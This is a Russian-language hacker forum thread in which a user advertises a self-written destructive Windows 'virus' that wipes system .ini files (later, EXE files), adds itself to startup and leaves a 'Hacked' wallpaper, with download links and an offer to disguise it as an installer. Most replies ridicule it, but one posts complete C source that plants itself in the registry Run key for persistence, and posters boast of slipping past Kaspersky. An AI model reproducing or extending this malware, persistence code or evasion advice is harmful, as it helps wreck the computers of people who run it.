![]() |
Новый вирус Hunter snake's
Привет всем, вот наконец-то я в сети, эх. Вот набросал вирусняк(просто видел сравнительно недавно как кто-то кидал на форум вир свой, решил сделать также свой).
Его действия: 1)в папке windows стирает все содержимое файлов ini и дописывает строку:"It is marked with a virus the Sn@k3'a - "Hunter snake's" 2)Далее делает файл с знаменитым кодо" svhost.exe -s"в папочке по пути "C:\Documents and Settings\имя пользователя, который собственно и запустил вирус\Главное меню\Программы\Автозагрузк а" З.Ы. хотел вообщем в реестре заместит, но если винда всеровно будет не рабочая, то зачем....Тем более он в таком случае будет палиться каспером 3)и на последок решил оставить красивую картинку на рабочем столе =) с пожеланием и так всем известной словом Hacked =))). не удержался ))). Вообщем так могу также данную программу наростить до любых размеров(в разумных пределах, у меня модем/в архиве ~40 кб, без него ~150 кб). Можно спрятать с любой программой, т.е. имитировать её установщик, нет проблем, крч ваши пожелания и добавления. Это не первый мой вирус, эх остальное убыло в небытие. Вообщем зацените вирус Hunter Snake's =). скачать >>> |
Цитата:
|
да ладно, можету кого-нибудь есть пробешенный комп или вторая винда =) но только на C:\. =).
|
хрень
|
Цитата:
киборг, для начала собственно протестируй , а уж после рассуждай |
Вирьмейкеры йопта.... как писал Bug(o)r , это может сделать любой кто прочитает 50-70 страниц учебника по программированию...
|
Народ, WMvare рулит ;)
|
не позорьте слово "вирус". Ещё с таким видом пишешь, как будто прям кодер всия Руси.
|
Понимаю вирь сделать который РЕАЛЬНО ЗАРАЖАЕТ КОМП... "вливатеся" в открываемыйе файлы, архивы, и т.д. пересылается по почте, диски... Который сидит до определенного момента, например дать ему дату типа 01.01.2007.= С НОВЫМ ГОДОМ ПРИДУРОК!!! или ПОКУПАЙТЕ НАШИ НОСКИ, И вирь валит винт... Или еще чего...
|
Полностью согласен :)
|
Ссла битая
|
Ну и порожняк ! Ну вы бы еще bat-файлы с командами типа del *.* выкладывали ! И почитай 29A чтобы иметь хоть смутное представление о том ЧТО ТАКОЕ ВИРУС !
|
Хм,да ладно,человек может начинающий,решил выложить,узнать на верном ли он пути,а вы его грузите.Может следующий будет лучше...
|
а гляньте мой?
http://forum.antichat.ru/showthread.php?t=23156&goto=newpost |
Не тупите, это не вирусы, а хреново написанный деструктивный ацтой.
|
tclover, полностью согласен.
|
Кстати, программы, которые пишут в HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run какую-нибудь инфу, ни Каспером, ни SAV CE не палятся, проверено лично. Другое дело, что этому "вирусу" это в натуре не нужно.
|
а как в делфи сделать так чтоб он туды записался
зы ссори шо не в тему... |
Код:
;use fasm to compile this sheat |
спасибо!!!!!
+ твой! не помешает... |
tclover, чувак над было сразу опкодами написать :D
|
Цитата:
|
Цитата:
ссыла обновилась! http://slil.ru/23069868 Кстати теперь он портит не ini, а EXE, что естественно выведет из строя винду |
Горбатого могила исправит.
|
tclover И не говори +)
эй а ты чего тут делаешь? ты htnl выучил? ) |
Неа :( Возьми меня в ученики падшая сволоч!
|
ээээ чего-то ты разошелся, ты так низко пал =). а чего ругаешься? мы цывилизованные люди.
|
http://webfile.ru/1080663
Написана на языке С (Visual C), не делает ничего плохого - только заносит в реестр в ключ автозагрузки , откуда ее запустили под именем damned. Проверь, Sn@k3, неужто Каспер вот прямо сходу несчастную программу выпалит? ---------------- #include<stdio.h> #include<string.h> #include<windows.h> #pragma comment(linker,"/MERGE:.rdata=.text") #pragma comment(linker,"/FILEALIGN:512 /SECTION:.text,EWRX /IGNORE:4078") #pragma comment(linker,"/ENTRY:WinMain") #pragma comment(linker,"/NODEFAULTLIB") //******************************************** int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR szCmdLine, int nCmdShow) { int nSize; char *file_path; char *buf; char **argv; DWORD argc; long int result; HKEY hKey; SetErrorMode(SEM_NOGPFAULTERRORBOX); //****************************************** argv = CommandLineToArgvW(GetCommandLineW(), &argc); buf = (char *)malloc(256); file_path = (char *)malloc(256); nSize = GetCurrentDirectory(256, buf); buf[nSize + 1] = '\0'; sprintf(file_path, "%s\\%ws", buf, argv[0]); result = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run ", 0, KEY_ALL_ACCESS, &hKey); // заносим в реестр .../Run под именем damned RegSetValueEx(hKey, "damned", 0, REG_SZ, file_path, strlen(file_path)); RegCloseKey(hKey); exit(0); } |
эх блин вирь писатель хренов
ты Че ВИрусоПисателей позориш та по моему статья херовая |
Цитата:
но кстати ты прав СВОЛАЧАМ падшим не чего делать на ачате Отжог ыыыыы пацотолом |
Цитата:
|
Хм... Интересно, что на webfile.ru все файлы проверяются именно Касперским, мой откомлиленный "супертрой" свободно доступен - Касперский ничего не заподозрил.
|
| Время: 18:24 |